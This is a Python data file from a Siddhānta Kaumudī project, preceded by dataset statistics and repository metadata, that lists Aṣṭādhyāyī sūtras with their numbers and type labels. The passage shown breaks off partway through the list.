| 79.136364 | 115 | 0.730902 | 983 | 6,964 | 5.038657 | 0.134283 | 0.121139 | 0.151423 | 0.218655 | 0.83727 | 0.768827 | 0.762366 | 0.762366 | 0.760549 | 0.760549 | 0 | 0.008671 | 0.105686 | 6,964 | 87 | 116 | 80.045977 | 0.786609 | 0 | 0 | 0 | 0 | 0 | 0.088311 | 0.003016 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.012346 | 0.012346 | 0 | 0.987654 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
212ca0e136dbb1fa89e55f7c25909878647d9226 | 126,185 | py | Python | issues/issue2.py | lalitaalaalitah/siddhantakaumudi | cfd071f085caed300946c757781f4751a5c8dfe2 | [
"MIT"
] | 13 | 2017-01-02T00:55:15.000Z | 2021-08-13T16:29:34.000Z | issues/issue2.py | kmadathil/siddhantakaumudi | 105b3ca1595527c3d5e67d52213de7c5e9dffca7 | [
"MIT"
] | 70 | 2017-01-15T11:14:31.000Z | 2021-01-15T21:45:35.000Z | issues/issue2.py | kmadathil/siddhantakaumudi | 105b3ca1595527c3d5e67d52213de7c5e9dffca7 | [
"MIT"
] | 4 | 2017-01-31T06:20:35.000Z | 2020-03-25T07:41:38.000Z | # This Python file uses the following encoding: utf-8
"""
Usage:
python issue2.py
"""
import re,codecs,sys
import lxml
sys.path.insert(0,'..')
import transcoder
# Data taken on loan from function.php of SanskritVerb repository.
ASdata=["1.1.1:संज्ञा:वृद्धिरादैच्","1.1.2:संज्ञा:अदेङ् गुणः","1.1.3:परिभाषा:इको गुणवृद्धी","1.1.4::न धातुलोप आर्धधातुके","1.1.5::ग्क्ङिति च","1.1.6::दीधीवेवीटाम्","1.1.7:संज्ञा:हलोऽनन्तराः संयोगः","1.1.8:संज्ञा:मुखनासिकावचनोऽनुनासिकः","1.1.9:संज्ञा:तुल्यास्यप्रयत्नं सवर्णम्","1.1.10:संज्ञा:नाज्झलौ","1.1.11:संज्ञा:ईदूदेद्द्विवचनं प्रगृह्यम्","1.1.12:संज्ञा:अदसो मात्","1.1.13:संज्ञा:शे","1.1.14:संज्ञा:निपात एकाजनाङ्","1.1.15:संज्ञा:ओत्","1.1.16:संज्ञा:सम्बुद्धौ शाकल्यस्येतावनार्षे","1.1.17:संज्ञा:उञः","1.1.18:संज्ञा:ऊँ","1.1.19:संज्ञा:ईदूतौ च सप्तम्यर्थे","1.1.20:संज्ञा:दाधा घ्वदाप्","1.1.21:परिभाषा:आद्यन्तवदेकस्मिन्","1.1.22:संज्ञा:तरप्तमपौ घः","1.1.23:संज्ञा:बहुगणवतुडति संख्या","1.1.24:संज्ञा:ष्णान्ता षट्","1.1.25:संज्ञा:डति च","1.1.26:संज्ञा:क्तक्तवतू निष्ठा","1.1.27:संज्ञा:सर्वादीनि सर्वनामानि","1.1.28:संज्ञा:विभाषा दिक्समासे बहुव्रीहौ","1.1.29:संज्ञा:न बहुव्रीहौ","1.1.30:संज्ञा:तृतीयासमासे","1.1.31:संज्ञा:द्वन्द्वे च","1.1.32:संज्ञा:विभाषा जसि","1.1.33:संज्ञा:प्रथमचरमतयाल्पार्धकतिपयनेमाश्च","1.1.34:संज्ञा:पूर्वपरावरदक्षिणोत्तरापराधराणि","1.1.35:संज्ञा:स्वमज्ञातिधनाख्यायाम्","1.1.36:संज्ञा:अन्तरं बहिर्योगोपसंव्यानयोः","1.1.37:संज्ञा:स्वरादिनिपातमव्ययम्","1.1.38:संज्ञा:तद्धितश्चासर्वविभक्तिः","1.1.39:संज्ञा:कृन्मेजन्तः","1.1.40:संज्ञा:क्त्वातोसुन्कसुनः","1.1.41:संज्ञा:अव्ययीभावश्च","1.1.42:संज्ञा:शि सर्वनामस्थानम्","1.1.43:संज्ञा:सुडनपुंसकस्य","1.1.44:संज्ञा:न वेति विभाषा","1.1.45:संज्ञा:इग्यणः सम्प्रसारणम्","1.1.46:परिभाषा:आद्यन्तौ टकितौ","1.1.47:परिभाषा:मिदचोऽन्त्यात्परः","1.1.48:परिभाषा:एच इग्घ्रस्वादेशे","1.1.49:परिभाषा:षष्ठी स्थानेयोगा","1.1.50:परिभाषा:स्थानेऽन्तरतमः","1.1.51:परिभाषा:उरण् रपरः","1.1.52:परिभाषा:अलोऽन्त्यस्य","1.1.53:परिभाषा:ङिच्च","1.1.54:परिभाषा:आदेः परस्य","1.1.55:परिभाषा:अनेकाल्शित्सर्वस्य","1.1.56:अतिदेशः:स्थानिवदादेशोऽनल्विधौ","1.1.57:अतिदेशः:अचः परस्मिन् पूर्वविधौ","1.1.58:अतिदेशः:न पदान्तद्विर्वचनवरेयलोपस्वरसवर्णानुस्वारदीर्घजश्चर्विधिषु","1.1.59:अतिदेशः:द्विर्वचनेऽचि","1.1.60:संज्ञा:अदर्शनं लोपः","1.1.61:संज्ञा:प्रत्ययस्य लुक्श्लुलुपः","1.1.62:परिभाषा:प्रत्ययलोपे प्रत्ययलक्षणम्","1.1.63:परिभाषा:न लुमताऽङ्गस्य","1.1.64:संज्ञा:अचोऽन्त्यादि टि","1.1.65:संज्ञा:अलोऽन्त्यात् पूर्व उपधा","1.1.66:परिभाषा:तस्मिन्निति निर्दिष्टे पूर्वस्य","1.1.67:परिभाषा:तस्मादित्युत्तरस्य","1.1.68::स्वं रूपं शब्दस्याशब्दसंज्ञा","1.1.69::अणुदित् सवर्णस्य चाप्रत्ययः","1.1.70::तपरस्तत्कालस्य","1.1.71:संज्ञा:आदिरन्त्येन सहेता","1.1.72:संज्ञा:येन विधिस्तदन्तस्य","1.1.73:संज्ञा:वृद्धिर्यस्याचामादिस्तद् वृद्धम्","1.1.74:संज्ञा:त्यदादीनि च","1.1.75:संज्ञा:एङ् प्राचां देशे","1.2.1:अतिदेशः:गाङ्कुटादिभ्योऽञ्णिन्ङ् इत्","1.2.2:अतिदेशः:विज इट्","1.2.3:अतिदेशः:विभाषोर्णोः","1.2.4:अतिदेशः:सार्वधातुकमपित्","1.2.5:अतिदेशः:असंयोगाल्लिट् कित्","1.2.6:अतिदेशः:ईन्धिभवतिभ्यां च","1.2.7:अतिदेशः:मृडमृदगुधकुषक्लिशवदवसः क्त्वा","1.2.8:अतिदेशः:रुदविदमुषग्रहिस्वपिप्रच्छः सँश्च","1.2.9:अतिदेशः:इको झल्","1.2.10:अतिदेशः:हलन्ताच्च","1.2.11:अतिदेशः:लिङ्सिचावात्मनेपदेषु","1.2.12:अतिदेशः:उश्च","1.2.13:अतिदेशः:वा गमः","1.2.14:अतिदेशः:हनः सिच्","1.2.15:अतिदेशः:यमो गन्धने","1.2.16:अतिदेशः:विभाषोपयमने","1.2.17:अतिदेशः:स्था घ्वोरिच्च","1.2.18:अतिदेशः:न क्त्वा सेट्","1.2.19:अतिदेशः:निष्ठा शीङ्स्विदिमिदिक्ष्विदिधृषः","1.2.20:अतिदेशः:मृषस्तितिक्षायाम्","1.2.21:अतिदेशः:उदुपधाद्भावादिकर्मणोरन्यतरस्याम्","1.2.22:अतिदेशः:पूङः क्त्वा च","1.2.23:अतिदेशः:नोपधात्थफान्ताद्वा","1.2.24:अतिदेशः:वञ्चिलुञ्च्यृतश्च","1.2.25:अतिदेशः:तृषिमृषिकृशेः काश्यपस्य","1.2.26:अतिदेशः:रलो व्युपधाद्धलादेः संश्च","1.2.27:संज्ञा:ऊकालोऽज्झ्रस्वदीर्घप्लुतः","1.2.28:परिभाषा:अचश्च","1.2.29:संज्ञा:उच्चैरुदात्तः","1.2.30:संज्ञा:नीचैरनुदात्तः","1.2.31:संज्ञा:समाहारः स्वरितः","1.2.32::तस्यादित उदात्तमर्धह्रस्वम्","1.2.33::एकश्रुति दूरात् सम्बुद्धौ","1.2.34::यज्ञकर्मण्यजपन्यूङ्खसामसु","1.2.35::उच्चैस्तरां वा वषट्कारः","1.2.36::विभाषा छन्दसि","1.2.37::न सुब्रह्मण्यायां स्वरितस्य तूदात्तः","1.2.38::देवब्रह्मणोरनुदात्तः","1.2.39::स्वरितात् संहितायामनुदात्तानाम्","1.2.40::उदात्तस्वरितपरस्य सन्नतरः","1.2.41:संज्ञा:अपृक्त एकाल् प्रत्ययः","1.2.42:संज्ञा:तत्पुरुषः समानाधिकरणः कर्मधारयः","1.2.43:संज्ञा:प्रथमानिर्दिष्टं समास उपसर्जनम्","1.2.44:संज्ञा:एकविभक्ति चापूर्वनिपाते","1.2.45:संज्ञा:अर्थवदधातुरप्रत्ययः प्रातिपदिकम्","1.2.46:संज्ञा:कृत्तद्धितसमासाश्च","1.2.47::ह्रस्वो नपुंसके प्रातिपदिकस्य","1.2.48::गोस्त्रियोरुपसर्ज्जनस्य","1.2.49::लुक् तद्धितलुकि","1.2.50::इद्गोण्याः","1.2.51:अतिदेशः:लुपि युक्तवद्व्यक्तिवचने","1.2.52:अतिदेशः:विशेषणानां चाजातेः","1.2.53::तदशिष्यं संज्ञाप्रमाणत्वात्","1.2.54::लुब्योगाप्रख्यानात्","1.2.55::योगप्रमाणे च तदभावेऽदर्शनं स्यात्","1.2.56::प्रधानप्रत्ययार्थवचनमर्थस्यान्यप्रमाणत्वात्","1.2.57::कालोपसर्जने च तुल्यम्","1.2.58::जात्याख्यायामेकस्मिन् बहुवचनमन्यतरस्याम्","1.2.59::अस्मदो द्वायोश्च","1.2.60::फल्गुनीप्रोष्ठपदानां च नक्षत्रे","1.2.61::छन्दसि पुनर्वस्वोरेकवचनम्","1.2.62::विशाखयोश्च","1.2.63::तिष्यपुनर्वस्वोर्नक्षत्रद्वंद्वे बहुवचनस्य","1.2.64::सरूपाणामेकशेष एकविभक्तौ","1.2.65::वृद्धो यूना तल्लक्षणश्चेदेव विशेषः","1.2.66:अतिदेशः:स्त्री पुंवच्च","1.2.67::पुमान् स्त्रिया","1.2.68::भ्रातृपुत्रौ स्वसृदुहितृभ्याम्","1.2.69::नपुंसकमनपुंसकेनैकवच्चास्यान्यतरस्याम्","1.2.70::पिता मात्रा","1.2.71::श्वशुरः श्वश्र्वा","1.2.72::त्यदादीनि सर्वैर्नित्यम्","1.2.73::ग्राम्यपशुसंघेषु अतरुणेषु स्त्री","1.3.1:संज्ञा:भूवादयो धातवः","1.3.2:संज्ञा:उपदेशेऽजनुनासिक इत्","1.3.3:संज्ञा:हलन्त्यम्","1.3.4:संज्ञा:न विभक्तौ तुस्माः","1.3.5:संज्ञा:आदिर्ञिटुडवः","1.3.6:संज्ञा:षः प्रत्ययस्य","1.3.7:संज्ञा:चुटू","1.3.8:संज्ञा:लशक्वतद्धिते","1.3.9:संज्ञा:तस्य लोपः","1.3.10:परिभाषा:यथासंख्यमनुदेशः समानाम्","1.3.11:परिभाषा:स्वरितेनाधिकारः","1.3.12::अनुदात्तङित आत्मनेपदम्","1.3.13::भावकर्म्मणोः","1.3.14::कर्त्तरि कर्म्मव्यतिहारे","1.3.15::न गतिहिंसार्थेभ्यः","1.3.16::इतरेतरान्योन्योपपदाच्च","1.3.17::नेर्विशः","1.3.18::परिव्यवेभ्यः क्रियः","1.3.19::विपराभ्यां जेः","1.3.20::आङो दोऽनास्यविहरणे","1.3.21::क्रीडोऽनुसम्परिभ्यश्च","1.3.22::समवप्रविभ्यः स्थः","1.3.23::प्रकाशनस्थेयाख्ययोश्च","1.3.24::उदोऽनूर्द्ध्वकर्मणि","1.3.25::उपान्मन्त्रकरणे","1.3.26::अकर्मकाच्च","1.3.27::उद्विभ्यां तपः","1.3.28::आङो यमहनः","1.3.29::समो गम्यृच्छिप्रच्छिस्वरत्यर्तिश्रुविदिभ्यः","1.3.30::निसमुपविभ्यो ह्वः","1.3.31::स्पर्द्धायामाङः","1.3.32::गन्धनावक्षेपणसेवनसाहसिक्यप्रतियत्नप्रकथनोपयोगेषु कृञः","1.3.33::अधेः प्रसहने","1.3.34::वेः शब्दकर्म्मणः","1.3.35::अकर्मकाच्च","1.3.36::सम्माननोत्सञ्जनाचार्यकरणज्ञानभृतिविगणनव्ययेषु नियः","1.3.37::कर्तृस्थे चाशरीरे कर्मणि","1.3.38::वृत्तिसर्गतायनेषु क्रमः","1.3.39::उपपराभ्याम्","1.3.40::आङ उद्गमने","1.3.41::वेः पादविहरणे","1.3.42::प्रोपाभ्यां समर्थाभ्याम्","1.3.43::अनुपसर्गाद्वा","1.3.44::अपह्नवे ज्ञः","1.3.45::अकर्मकाच्च","1.3.46::सम्प्रतिभ्यामनाध्याने","1.3.47::भासनोपसम्भाषाज्ञानयत्नविमत्युपमन्त्रणेषु वदः","1.3.48::व्यक्तवाचां समुच्चारणे","1.3.49::अनोरकर्मकात्","1.3.50::विभाषा विप्रलापे","1.3.51::अवाद्ग्रः","1.3.52::समः प्रतिज्ञाने","1.3.53::उदश्चरः सकर्मकात्","1.3.54::समस्तृतीयायुक्तात्","1.3.55::दाणश्च सा चेच्चतुर्थ्यर्थे","1.3.56::उपाद्यमः स्वकरणे","1.3.57::ज्ञाश्रुस्मृदृशां सनः","1.3.58::नानोर्ज्ञः","1.3.59::प्रत्याङ्भ्यां श्रुवः","1.3.60::शदेः शितः","1.3.61::म्रियतेर्लुङ्लिङोश्च","1.3.62:अतिदेशः:पूर्ववत् सनः","1.3.63:अतिदेशः:आम्प्रत्ययवत् कृञोऽनुप्रयोगस्य","1.3.64::प्रोपाभ्यां युजेरयज्ञपात्रेषु","1.3.65::समः क्ष्णुवः","1.3.66::भुजोऽनवने","1.3.67::णेरणौ यत् कर्म णौ चेत् स कर्ताऽनाध्याने","1.3.68::भीस्म्योर्हेतुभये","1.3.69::गृधिवञ्च्योः प्रलम्भने","1.3.70::लियः सम्माननशालिनीकरणयोश्च","1.3.71::मिथ्योपपदात् कृञोऽभ्यासे","1.3.72::स्वरितञितः कर्त्रभिप्राये क्रियाफले","1.3.73::अपाद्वदः","1.3.74::णिचश्च","1.3.75::समुदाङ्भ्यो यमोऽग्रन्थे","1.3.76::अनुपसर्गाज्ज्ञः","1.3.77::विभाषोपपदेन प्रतीयमाने","1.3.78::शेषात् कर्तरि परस्मैपदम्","1.3.79::अनुपराभ्यां कृञः","1.3.80::अभिप्रत्यतिभ्यः क्षिपः","1.3.81::प्राद्वहः","1.3.82::परेर्मृषः","1.3.83::व्याङ्परिभ्यो रमः","1.3.84::उपाच्च","1.3.85::विभाषाऽकर्मकात्","1.3.86::बुधयुधनशजनेङ्प्रुद्रुस्रुभ्यो णेः","1.3.87::निगरणचलनार्थेभ्यः","1.3.88::अणावकर्मकाच्चित्तवत्कर्तृकात्","1.3.89::न पादम्याङ्यमाङ्यसपरिमुहरुचिनृतिवदवसः","1.3.90::वा क्यषः","1.3.91::द्युद्भ्यो लुङि","1.3.92::वृद्भ्यः स्यसनोः","1.3.93::लुटि च कॢपः","1.4.1:अधिकारः:आ कडारादेका संज्ञा","1.4.2:परिभाषा:विप्रतिषेधे परं कार्यम्","1.4.3:संज्ञा:यू स्त्र्याख्यौ नदी","1.4.4:संज्ञा:नेयङुवङ्स्थानावस्त्री","1.4.5:संज्ञा:वाऽऽमि","1.4.6:संज्ञा:ङिति ह्रस्वश्च","1.4.7:संज्ञा:शेषो घ्यसखि","1.4.8:संज्ञा:पतिः समास एव","1.4.9:संज्ञा:षष्ठीयुक्तश्छन्दसि वा","1.4.10:संज्ञा:ह्रस्वं लघु","1.4.11:संज्ञा:संयोगे गुरु","1.4.12:संज्ञा:दीर्घं च","1.4.13:संज्ञा:यस्मात् प्रत्ययविधिस्तदादि प्रत्ययेऽङ्गम्","1.4.14:संज्ञा:सुप्तिङन्तं पदम्","1.4.15:संज्ञा:नः क्ये","1.4.16:संज्ञा:सिति च","1.4.17:संज्ञा:स्वादिष्वसर्वनामस्थाने","1.4.18:संज्ञा:यचि भम्","1.4.19:संज्ञा:तसौ मत्वर्थे","1.4.20:संज्ञा:अयस्मयादीनि च्छन्दसि","1.4.21::बहुषु बहुवचनम्","1.4.22::द्व्येकयोर्द्विवचनैकवचने","1.4.23:संज्ञा; अधिकारः:कारके","1.4.24:संज्ञा:ध्रुवमपायेऽपादानम्","1.4.25:संज्ञा:भीत्रार्थानां भयहेतुः","1.4.26:संज्ञा:पराजेरसोढः","1.4.27:संज्ञा:वारणार्थानां ईप्सितः","1.4.28:संज्ञा:अन्तर्द्धौ येनादर्शनमिच्छति","1.4.29:संज्ञा:आख्यातोपयोगे","1.4.30:संज्ञा:जनिकर्तुः प्रकृतिः","1.4.31:संज्ञा:भुवः प्रभवः","1.4.32:संज्ञा:कर्मणा यमभिप्रैति स सम्प्रदानम्","1.4.33:संज्ञा:रुच्यर्थानां प्रीयमाणः","1.4.34:संज्ञा:श्लाघह्नुङ्स्थाशपां ज्ञीप्स्यमानः","1.4.35:संज्ञा:धारेरुत्तमर्णः","1.4.36:संज्ञा:स्पृहेरीप्सितः","1.4.37:संज्ञा:क्रुधद्रुहेर्ष्याऽसूयार्थानां यं प्रति कोपः","1.4.38:संज्ञा:क्रुधद्रुहोरुपसृष्टयोः कर्म","1.4.39:संज्ञा:राधीक्ष्योर्यस्य विप्रश्नः","1.4.40:संज्ञा:प्रत्याङ्भ्यां श्रुवः पूर्वस्य कर्ता","1.4.41:संज्ञा:अनुप्रतिगृणश्च","1.4.42:संज्ञा:साधकतमं करणम्","1.4.43:संज्ञा:दिवः कर्म च","1.4.44:संज्ञा:परिक्रयणे सम्प्रदानमन्यतरस्याम्","1.4.45:संज्ञा:आधारोऽधिकरणम्","1.4.46:संज्ञा:अधिशीङ्स्थाऽऽसां कर्म","1.4.47:संज्ञा:अभिनिविशश्च","1.4.48:संज्ञा:उपान्वध्याङ्वसः","1.4.49:संज्ञा:कर्तुरीप्सिततमं कर्म","1.4.50:संज्ञा:तथायुक्तं चानिप्सीतम्","1.4.51:संज्ञा:अकथितं च","1.4.52:संज्ञा:गतिबुद्धिप्रत्यवसानार्थशब्दकर्माकर्मकाणामणि कर्ता","1.4.53:संज्ञा:हृक्रोरन्यतरस्याम्","1.4.54:संज्ञा:स्वतन्त्रः कर्ता","1.4.55:संज्ञा:तत्प्रयोजको हेतुश्च","1.4.56:अधिकारः:प्राग्रीश्वरान्निपाताः","1.4.57::चादयोऽसत्त्वे","1.4.58::प्रादयः","1.4.59:संज्ञा:उपसर्गाः क्रियायोगे","1.4.60:संज्ञा:गतिश्च","1.4.61:संज्ञा:ऊर्यादिच्विडाचश्च","1.4.62:संज्ञा:अनुकरणं चानितिपरम्","1.4.63:संज्ञा:आदरानादरयोः सदसती","1.4.64:संज्ञा:भूषणेऽलम्","1.4.65:संज्ञा:अन्तरपरिग्रहे","1.4.66:संज्ञा:कणेमनसी श्रद्धाप्रतीघाते","1.4.67:संज्ञा:पुरोऽव्ययम्","1.4.68:संज्ञा:अस्तं च","1.4.69:संज्ञा:अच्छ गत्यर्थवदेषु","1.4.70:संज्ञा:अदोऽनुपदेशे","1.4.71:संज्ञा:तिरोऽन्तर्द्धौ","1.4.72:संज्ञा:विभाषा कृञि","1.4.73:संज्ञा:उपाजेऽन्वाजे","1.4.74:संज्ञा:साक्षात्प्रभृतीनि च","1.4.75:संज्ञा:अनत्याधान उरसिमनसी","1.4.76:संज्ञा:मध्येपदेनिवचने च","1.4.77:संज्ञा:नित्यं हस्ते पाणावुपयमने","1.4.78:संज्ञा:प्राध्वं बन्धने","1.4.79:संज्ञा:जीविकोपनिषदावौपम्ये","1.4.80::ते प्राग्धातोः","1.4.81::छन्दसि परेऽपि","1.4.82::व्यवहिताश्च","1.4.83:संज्ञा; अधिकारः:कर्मप्रवचनीयाः","1.4.84:संज्ञा:अनुर्लक्षणे","1.4.85:संज्ञा:तृतीयाऽर्थे","1.4.86:संज्ञा:हीने","1.4.87:संज्ञा:उपोऽधिके च","1.4.88:संज्ञा:अपपरी वर्जने","1.4.89:संज्ञा:आङ् मर्यादावचने","1.4.90:संज्ञा:लक्षणेत्थम्भूताख्यानभागवीप्सासु प्रतिपर्यनवः","1.4.91:संज्ञा:अभिरभागे","1.4.92:संज्ञा:प्रतिः प्रतिनिधिप्रतिदानयोः","1.4.93:संज्ञा:अधिपरी अनर्थकौ","1.4.94:संज्ञा:सुः पूजायाम्","1.4.95:संज्ञा:अतिरतिक्रमणे च","1.4.96:संज्ञा:अपिः पदार्थसम्भावनान्ववसर्गगर्हासमुच्चयेषु","1.4.97:संज्ञा:अधिरीश्वरे","1.4.98:संज्ञा:विभाषा कृञि","1.4.99:संज्ञा:लः परस्मैपदम्","1.4.100:संज्ञा:तङानावात्मनेपदम्","1.4.101:संज्ञा:तिङस्त्रीणि त्रीणि प्रथममध्यमोत्तमाः","1.4.102:संज्ञा:तान्येकवचनद्विवचनबहुवचनान्येकशः","1.4.103:संज्ञा:सुपः","1.4.104:संज्ञा:विभक्तिश्च","1.4.105::युष्मद्युपपदे समानाधिकरणे स्थानिन्यपि मध्यमः","1.4.106::प्रहासे च मन्योपपदे मन्यतेरुत्तम एकवच्च","1.4.107::अस्मद्युत्तमः","1.4.108::शेषे प्रथमः","1.4.109:संज्ञा:परः संनिकर्षः संहिता","1.4.110:संज्ञा:विरामोऽवसानम्","2.1.1:परिभाषा:समर्थः पदविधिः","2.1.2:अतिदेशः:सुबामन्त्रिते पराङ्गवत् स्वरे","2.1.3:संज्ञा; अधिकारः:प्राक् कडारात् समासः","2.1.4::सह सुपा","2.1.5:संज्ञा; अधिकारः:अव्ययीभावः","2.1.6::अव्ययं विभक्तिसमीपसमृद्धिव्यृद्ध्यर्थाभावात्ययासम्प्रतिशब्दप्रादुर्भावपश्चाद्यथाऽऽनुपूर्व्ययौगपद्यसादृश्यसम्पत्तिसाकल्यान्तवचनेषु","2.1.7::यथाऽसादृये","2.1.8::यावदवधारणे","2.1.9::सुप्प्रतिना मात्राऽर्थे","2.1.10::अक्षशलाकासंख्याः परिणा","2.1.11::विभाषा","2.1.12::अपपरिबहिरञ्चवः पञ्चम्या","2.1.13::आङ् मर्यादाऽभिविध्योः","2.1.14::लक्षणेनाभिप्रती आभिमुख्ये","2.1.15::अनुर्यत्समया","2.1.16::यस्य चायामः","2.1.17::तिष्ठद्गुप्रभृतीनि च","2.1.18::पारे मध्ये षष्ठ्या वा","2.1.19::संख्या वंश्येन","2.1.20::नदीभिश्च","2.1.21::अन्यपदार्थे च संज्ञायाम्","2.1.22:संज्ञा; अधिकारः:तत्पुरुषः","2.1.23:संज्ञा:द्विगुश्च","2.1.24::द्वितीया श्रितातीतपतितगतात्यस्तप्राप्तापन्नैः","2.1.25::स्वयं क्तेन","2.1.26::खट्वा क्षेपे","2.1.27::सामि","2.1.28::कालाः","2.1.29::अत्यन्तसंयोगे च","2.1.30::तृतीया तत्कृतार्थेन गुणवचनेन","2.1.31::पूर्वसदृशसमोनार्थकलहनिपुणमिश्रश्लक्ष्णैः","2.1.32::कर्तृकरणे कृता बहुलम्","2.1.33::कृत्यैरधिकार्थवचने","2.1.34::अन्नेन व्यञ्जनम्","2.1.35::भक्ष्येण मिश्रीकरणम्","2.1.36::चतुर्थी तदर्थार्थबलिहितसुखरक्षितैः","2.1.37::पञ्चमी भयेन","2.1.38::अपेतापोढमुक्तपतितापत्रस्तैरल्पशः","2.1.39::स्तोकान्तिकदूरार्थकृच्छ्राणि क्तेन","2.1.40::सप्तमी शौण्डैः","2.1.41::सिद्धशुष्कपक्वबन्धैश्च","2.1.42::ध्वाङ्क्षेण क्षेपे","2.1.43::कृत्यैर्ऋणे","2.1.44::संज्ञायाम्","2.1.45::क्तेनाहोरात्रावयवाः","2.1.46::तत्र","2.1.47::क्षेपे","2.1.48::पात्रेसमितादयश्च","2.1.49::पूर्वकालैकसर्वजरत्पुराणनवकेवलाः समानाधिकरणेन","2.1.50::दिक्संख्ये संज्ञायाम्","2.1.51::तद्धितार्थोत्तरपदसमाहारे च","2.1.52::संख्यापूर्वो द्विगुः","2.1.53::कुत्सितानि कुत्सनैः","2.1.54::पापाणके कुत्सितैः","2.1.55::उपमानानि सामान्यवचनैः","2.1.56::उपमितं व्याघ्रादिभिः सामान्याप्रयोगे","2.1.57::विशेषणं विशेष्येण बहुलम्","2.1.58::पूर्वापरप्रथमचरमजघन्यसमानमध्यमध्यमवीराश्च","2.1.59::श्रेण्यादयः कृतादिभिः","2.1.60::क्तेन नञ्विशिष्टेनानञ्","2.1.61::सन्महत्परमोत्तमोत्कृष्टाः पूज्यमानैः","2.1.62::वृन्दारकनागकुञ्जरैः पूज्यमानम्","2.1.63::कतरकतमौ जातिपरिप्रश्ने","2.1.64::किं क्षेपे","2.1.65::पोटायुवतिस्तोककतिपयगृष्टिधेनुवशावेहत्बष्कयणीप्रवक्तॄश्रोत्रियाध्यापकधूर्तैर्जातिः","2.1.66::प्रशंसावचनैश्च","2.1.67::युवा खलतिपलितवलिनजरतीभिः","2.1.68::कृत्यतुल्याख्या अजात्या","2.1.69::वर्णो वर्णेन","2.1.70::कुमारः श्रमणाऽऽदिभिः","2.1.71::चतुष्पादो गर्भिण्या","2.1.72::मयूरव्यंसकादयश्च","2.2.1::पूर्वापराधरोत्तरमेकदेशिनैकाधिकरणे","2.2.2::अर्धं नपुंसकम्","2.2.3::द्वितीयतृतीयचतुर्थतुर्याण्यन्यतरस्याम्","2.2.4::प्राप्तापन्ने च द्वितीयया","2.2.5::कालाः परिमाणिना","2.2.6::नञ्","2.2.7::ईषदकृता","2.2.8::षष्ठी","2.2.9::याजकादिभिश्च","2.2.10::न निर्धारणे","2.2.11::पूरणगुणसुहितार्थसदव्ययतव्यसमानाधिकरणेन","2.2.12::क्तेन च पूजायाम्","2.2.13::अधिकरणवाचिना च","2.2.14::कर्म्मणि च","2.2.15::तृजकाभ्यां कर्तरि","2.2.16::कर्त्तरि च","2.2.17::नित्यं क्रीडाजीविकयोः","2.2.18::कुगतिप्रादयः","2.2.19::उपपदमतिङ्","2.2.20::अमैवाव्ययेन","2.2.21::तृतीयाप्रभृतीन्यन्यतरस्याम्","2.2.22::क्त्वा च","2.2.23:संज्ञा:शेषो बहुव्रीहिः","2.2.24::अनेकमन्यपदार्थे","2.2.25::संख्ययाऽव्ययासन्नादूराधिकसंख्याः संख्येये","2.2.26::दिङ्नामान्यन्तराले","2.2.27::तत्र तेनेदमिति सरूपे","2.2.28::तेन सहेति तुल्ययोगे","2.2.29:संज्ञा:चार्थे द्वंद्वः","2.2.30::उपसर्जनं पूर्वम्","2.2.31::राजदन्तादिषु परम्","2.2.32::द्वंद्वे घि","2.2.33::अजाद्यदन्तम्","2.2.34::अल्पाच्तरम्","2.2.35::सप्तमीविशेषणे बहुव्रीहौ","2.2.36::निष्ठा","2.2.37::वाऽऽहिताग्न्यादिषु","2.2.38::कडाराः कर्मधराये","2.3.1:अधिकारः:अनभिहिते","2.3.2::कर्मणि द्वितीया","2.3.3::तृतीया च होश्छन्दसि","2.3.4::अन्तराऽन्तरेण युक्ते","2.3.5::कालाध्वनोरत्यन्तसंयोगे","2.3.6::अपवर्गे तृतीया","2.3.7::सप्तमीपञ्चम्यौ कारकमध्ये","2.3.8::कर्मप्रवचनीययुक्ते द्वितीया","2.3.9::यस्मादधिकं यस्य चेश्वरवचनं तत्र सप्तमी","2.3.10::पञ्चमी अपाङ्परिभिः","2.3.11::प्रतिनिधिप्रतिदाने च यस्मात्","2.3.12::गत्यर्थकर्मणि द्वितीयाचतुर्थ्यौ चेष्टायामनध्वनि","2.3.13::चतुर्थी सम्प्रदाने","2.3.14::क्रियार्थोपपदस्य च कर्मणि स्थानिनः","2.3.15::तुमर्थाच्च भाववचनात्","2.3.16::नमःस्वस्तिस्वाहास्वधालंवषड्योगाच्च","2.3.17::मन्यकर्मण्यनादरे विभाषाऽप्राणिषु","2.3.18::कर्तृकरणयोस्तृतीया","2.3.19::सहयुक्तेऽप्रधाने","2.3.20::येनाङ्गविकारः","2.3.21::इत्थंभूतलक्षणे","2.3.22::संज्ञोऽन्यतरस्यां कर्मणि","2.3.23::हेतौ","2.3.24::अकर्तर्यृणे पञ्चमी","2.3.25::विभाषा गुणेऽस्त्रियाम्","2.3.26::षष्ठी हेतुप्रयोगे","2.3.27::सर्वनाम्नस्तृतीया च","2.3.28::अपादाने पञ्चमी","2.3.29::अन्यारादितरर्त्तेदिक्शब्दाञ्चूत्तरपदाजाहियुक्ते","2.3.30::षष्ठ्यतसर्थप्रत्ययेन","2.3.31::एनपा द्वितीया","2.3.32::पृथग्विनानानाभिस्तृतीयाऽन्यतरस्याम्","2.3.33::करणे च स्तोकाल्पकृच्छ्रकतिपयस्यासत्त्ववचनस्य","2.3.34::दूरान्तिकार्थैः षष्ठ्यन्यतरस्याम्","2.3.35::दूरान्तिकार्थेभ्यो द्वितीया च","2.3.36::सप्तम्यधिकरणे च","2.3.37::यस्य च भावेन भावलक्षणम्","2.3.38::षष्ठी चानादरे","2.3.39::स्वामीश्वराधिपतिदायादसाक्षिप्रतिभूप्रसूतैश्च","2.3.40::आयुक्तकुशलाभ्यां चासेवायाम्","2.3.41::यतश्च निर्धारणम्","2.3.42::पञ्चमी विभक्ते","2.3.43::साधुनिपुणाभ्याम् अर्चायां सप्तम्यप्रतेः","2.3.44::प्रसितोत्सुकाभ्यां तृतीया च","2.3.45::नक्षत्रे च लुपि","2.3.46::प्रातिपदिकार्थलिङ्गपरिमाणवचनमात्रे प्रथमा","2.3.47::सम्बोधने च","2.3.48:संज्ञा:साऽऽमन्त्रितम्","2.3.49:संज्ञा:एकवचनं संबुद्धिः","2.3.50::षष्ठी शेषे","2.3.51::ज्ञोऽविदर्थस्य करणे","2.3.52::अधीगर्थदयेशां कर्मणि","2.3.53::कृञः 